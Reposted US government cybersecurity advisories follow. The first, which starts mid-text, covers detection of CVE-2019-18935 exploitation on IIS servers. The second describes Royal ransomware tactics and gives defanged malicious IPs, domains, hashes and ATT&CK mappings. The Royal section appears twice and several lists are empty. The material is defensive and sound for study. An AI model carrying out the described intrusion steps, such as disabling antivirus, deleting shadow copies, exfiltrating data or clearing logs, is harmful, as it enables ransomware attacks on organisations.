(Windows C runtime library) to execute payload.Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address
45.77.212[.]12
correlates to TA1, but the pattern can be used as general practice to identify similar activity.Additional Searching for IIS Servers
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
File Type: DLL
Location: – %SystemDrive%WindowsTemp
When this CVE is exploited, it uploads malicious DLL files to the
C:WindowsTemp
directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example:
1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex:
d{10}.d{1,8}.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
Log Type: IIS
Location: – %SystemDrive%inetpublogsLogFiles
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
General Name
Field Name
Description
Method
cs-method
Requested action; for example, a GET method
URI Stem
cs-uri-stem
Universal Resource Identifier (URI), or target, of the action
URI Query
cs-uri-query
The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages.
Protocol Status
sc-status
Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Artifacts:
Field Name
Artifact
cs-method
POST
>cs-uri-stem
/Telerik.Web.UI.WebResource.axd
cs-uri-query
type=rau
sc-status
200 and 302
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
Log Type: Windows Event Application Logs
Location: -%SystemDrive%WindowsSystem32winevtlogsApplication.evtx
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
EventID
Payload
1309
3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type ‘System.Configuration.Install.AssemblyInstaller’ to type ‘Telerik.Web.UI.IAsyncUploadConfiguration’.n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)nn, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)n”,”Binary”:””}}
Authoring organizations recommend looking for the following key strings in the payload:
w3wp.exe
: This is the parent process that executes the code inside the malicious DLLs.System.Configuration.Install.AssemblyInstaller
: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
EventID
ExecutableInfo
MapDescription
Payload
1000
w3wp.exe |1664175639.65719.dll
|c:windowssystem32inetsrvw3wp.exe |C:WindowsTemp1664175639.65719.dll
Application Error
{“EventData”:{“Data”:”w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7″,”Binary”:””}}
1001
w3wp.exe |1664175639.65719.dll |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe
Application Crash
{“EventData”:{“Data”:”0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, nC:\Windows\Temp\WERE3F6.tmp.appcompat.txtnC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xmlnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmpnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4″,”Binary”:””}}
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:WindowsTemp directory.
Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.
Additional Analysis
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
w3wp.exe
in Windows security event logs (e.g., Windows EventID 4688 New Process created).Trellix XDR Platform Searching
If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:
Field
Value Begins With
TextAtLowestOffset
MZ
MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations
Segment Networks Based on Function
Other Best Practice Mitigation Recommendations
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
UNIX Timestamp Converter
REFERENCES
[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935
ACKNOWLEDGEMENTS
Google’s Threat Analysis Group (TAG) contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.
Source de l’article sur us-cert.gov
SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a
.onion
URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using
Chisel
, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool
PsExec
has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
vssadmin.exe
) to delete shadow copies to prevent system recovery.[1]FBI has found numerous batch (
.bat
) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
IOC
Description
.royal
Encrypted file extension
README.TXT
Ransom note
Malicious IP
Last Activity
102.157.44[.]105
November 2022
105.158.118[.]241
November 2022
105.69.155[.]85
November 2022
113.169.187[.]159
November 2022
134.35.9[.]209
November 2022
139.195.43[.]166
November 2022
139.60.161[.]213
November 2022
148.213.109[.]165
November 2022
163.182.177[.]80
November 2022
181.141.3[.]126
November 2022
181.164.194[.]228
November 2022
185.143.223[.]69
November 2022
186.64.67[.]6
November 2022
186.86.212[.]138
November 2022
190.193.180[.]228
November 2022
196.70.77[.]11
November 2022
197.11.134[.]255
November 2022
197.158.89[.]85
November 2022
197.204.247[.]7
November 2022
197.207.181[.]147
November 2022
197.207.218[.]27
November 2022
197.94.67[.]207
November 2022
23.111.114[.]52
November 2022
41.100.55[.]97
November 2022
41.107.77[.]67
November 2022
41.109.11[.]80
November 2022
41.251.121[.]35
November 2022
41.97.65[.]51
November 2022
42.189.12[.]36
November 2022
45.227.251[.]167
November 2022
5.44.42[.]20
November 2022
61.166.221[.]46
November 2022
68.83.169[.]91
November 2022
81.184.181[.]215
November 2022
82.12.196[.]197
November 2022
98.143.70[.]147
November 2022
140.82.48[.]158
December 2022
147.135.36[.]162
December 2022
147.135.11[.]223
December 2022
152.89.247[.]50
December 2022
172.64.80[.]1
December 2022
179.43.167[.]10
December 2022
185.7.214[.]218
December 2022
193.149.176[.]157
December 2022
193.235.146[.]104
December 2022
209.141.36[.]116
December 2022
45.61.136[.]47
December 2022
45.8.158[.]104
December 2022
5.181.234[.]58
December 2022
5.188.86[.]195
December 2022
77.73.133[.]84
December 2022
89.108.65[.]136
December 2022
94.232.41[.]105
December 2022
47.87.229[.]39
January 2023
Malicious Domain
Last Observed
ciborkumari[.]xyz
October 2022
sombrat[.]com
October 2022
gororama[.]com
November 2022
softeruplive[.]com
November 2022
altocloudzone[.]live
December 2022
ciborkumari[.]xyz
December 2022
myappearinc[.]com
December 2022
parkerpublic[.]com
December 2022
pastebin.mozilla[.]org/Z54Vudf9/raw
December 2022
tumbleproperty[.]com
December 2022
myappearinc[.]com/acquire/draft/c7lh0s5jv
January 2023
Tool
SHA256
AV tamper
8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375
TCP/UDP Tunnel over HTTP (Chisel)
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
Ursnif/Gozi
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
Exfil
B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20
Remote Access (AnyDesk)
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7
PowerShell Toolkit Downloader
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
PsExec (Microsoft Sysinternals)
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c
Keep Host Unlocked (Don’t Sleep)
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
Ransomware Executable
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
Windows Command Line (NirCmd)
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5
System Management (NSudo)
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618
Batch Scripts
Filename
Hash Value
2.bat
585b05b290d241a249af93b1896a9474128da969
3.bat
41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d
4.bat
a84ed0f3c46b01d66510ccc9b1fc1e07af005c60
8.bat
c96154690f60a8e1f2271242e458029014ffe30a
kl.bat
65dc04f3f75deb3b287cca3138d9d0ec36b8bea0
gp.bat
82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58
r.bat
74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c
runanddelete.bat
342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE
MITRE ATT&CK TECHNIQUES
See table 3 for all referenced threat actor tactics and techniques included in this advisory.
Initial Access
Technique Title
ID
Use
Exploit Public Facing Application
T1190
The actors gain initial access through public-facing applications.
Phishing: Spear phishing Attachment
T1566.001
The actors gain initial access through malicious PDF attachments sent via email.
Phishing: Spearphishing Link
T1566.002
The actors gain initial access using malvertising links via emails and public-facing sites.
External Remote Services
T1133
The actors gain initial access through a variety of RMM software.
Command and Control
Technique Title
ID
Use
Ingress Tool Transfer
T1105
The actors used C2 infrastructure to download multiple tools.
Protocol Tunneling
T1572
The actors used an encrypted SSH tunnel to communicate within C2 infrastructure.
Privilege Escalation
Technique Title
ID
Use
Valid Accounts: Domain Accounts
T1078.002
The actors used encrypted files to create new admin user accounts.
Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
The actors deactivated antivirus protocols.
Domain Policy Modification: Group Policy Modification
T1484.001
The actors modified Group Policy Objects to subvert antivirus protocols.
Indicator Removal: Clear Windows Event Logs
T1070.001
The actors deleted shadow files and system and security logs after exfiltration.
Remote Desktop Protocol
T1021.001
The actors used valid accounts to move laterally through the domain controller using RDP.
Automated Collection
T1119
The actors used registry keys to auto-extract and collect files.
Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
RESOURCES
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads – Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile – Royal | Cyber.gov.au
ACKNOWLEDGEMENTS
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.
Source de l’article sur us-cert.gov
#StopRansomware: Royal Ransomware
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a
.onion
URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using
Chisel
, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool
PsExec
has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
vssadmin.exe
) to delete shadow copies to prevent system recovery.[1]FBI has found numerous batch (
.bat
) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
IOC
Description
.royal
Encrypted file extension
README.TXT
Ransom note
Malicious IP
Last Activity
102.157.44[.]105
November 2022
105.158.118[.]241
November 2022
105.69.155[.]85
November 2022
113.169.187[.]159
November 2022
134.35.9[.]209
November 2022
139.195.43[.]166
November 2022
139.60.161[.]213
November 2022
148.213.109[.]165
November 2022
163.182.177[.]80
November 2022
181.141.3[.]126
November 2022
181.164.194[.]228
November 2022
185.143.223[.]69
November 2022
186.64.67[.]6
November 2022
186.86.212[.]138
November 2022
190.193.180[.]228
November 2022
196.70.77[.]11
November 2022
197.11.134[.]255
November 2022
197.158.89[.]85
November 2022
197.204.247[.]7
November 2022
197.207.181[.]147
November 2022
197.207.218[.]27
November 2022
197.94.67[.]207
November 2022
23.111.114[.]52
November 2022
41.100.55[.]97
November 2022
41.107.77[.]67
November 2022
41.109.11[.]80
November 2022
41.251.121[.]35
November 2022
41.97.65[.]51
November 2022
42.189.12[.]36
November 2022
45.227.251[.]167
November 2022
5.44.42[.]20
November 2022
61.166.221[.]46
November 2022
68.83.169[.]91
November 2022
81.184.181[.]215
November 2022
82.12.196[.]197
November 2022
98.143.70[.]147
November 2022
140.82.48[.]158
December 2022
147.135.36[.]162
December 2022
147.135.11[.]223
December 2022
152.89.247[.]50
December 2022
179.43.167[.]10
December 2022
185.7.214[.]218
December 2022
193.149.176[.]157
December 2022
193.235.146[.]104
December 2022
209.141.36[.]116
December 2022
45.61.136[.]47
December 2022
45.8.158[.]104
December 2022
5.181.234[.]58
December 2022
5.188.86[.]195
December 2022
77.73.133[.]84
December 2022
89.108.65[.]136
December 2022
94.232.41[.]105
December 2022
47.87.229[.]39
January 2023
Malicious Domain
Last Observed
ciborkumari[.]xyz
October 2022
sombrat[.]com
October 2022
gororama[.]com
November 2022
softeruplive[.]com
November 2022
altocloudzone[.]live
December 2022
ciborkumari[.]xyz
December 2022
myappearinc[.]com
December 2022
parkerpublic[.]com
December 2022
pastebin.mozilla[.]org/Z54Vudf9/raw
December 2022
tumbleproperty[.]com
December 2022
myappearinc[.]com/acquire/draft/c7lh0s5jv
January 2023
Tool
SHA256
AV tamper
8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375
TCP/UDP Tunnel over HTTP (Chisel)
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
Ursnif/Gozi
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
Exfil
B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20
Remote Access (AnyDesk)
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7
PowerShell Toolkit Downloader
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
PsExec (Microsoft Sysinternals)
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c
Keep Host Unlocked (Don’t Sleep)
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
Ransomware Executable
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
Windows Command Line (NirCmd)
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5
System Management (NSudo)
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618
Batch Scripts
Filename
Hash Value
2.bat
585b05b290d241a249af93b1896a9474128da969
3.bat
41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d
4.bat
a84ed0f3c46b01d66510ccc9b1fc1e07af005c60
8.bat
c96154690f60a8e1f2271242e458029014ffe30a
kl.bat
65dc04f3f75deb3b287cca3138d9d0ec36b8bea0
gp.bat
82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58
r.bat
74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c
runanddelete.bat
342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE
MITRE ATT&CK TECHNIQUES
See table 3 for all referenced threat actor tactics and techniques included in this advisory.
Initial Access
Technique Title
ID
Use
Exploit Public Facing Application
T1190
The actors gain initial access through public-facing applications.
Phishing: Spear phishing Attachment
T1566.001
The actors gain initial access through malicious PDF attachments sent via email.
Phishing: Spearphishing Link
T1566.002
The actors gain initial access using malvertising links via emails and public-facing sites.
External Remote Services
T1133
The actors gain initial access through a variety of RMM software.
Command and Control
Technique Title
ID
Use
Ingress Tool Transfer
T1105
The actors used C2 infrastructure to download multiple tools.
Protocol Tunneling
T1572
The actors used an encrypted SSH tunnel to communicate within C2 infrastructure.
Privilege Escalation
Technique Title
ID
Use
Valid Accounts: Domain Accounts
T1078.002
The actors used encrypted files to create new admin user accounts.
Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
The actors deactivated antivirus protocols.
Domain Policy Modification: Group Policy Modification
T1484.001
The actors modified Group Policy Objects to subvert antivirus protocols.
Indicator Removal: Clear Windows Event Logs
T1070.001
The actors deleted shadow files and system and security logs after exfiltration.
Remote Desktop Protocol
T1021.001
The actors used valid accounts to move laterally through the domain controller using RDP.
Automated Collection
T1119
The actors used registry keys to auto-extract and collect files.
Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
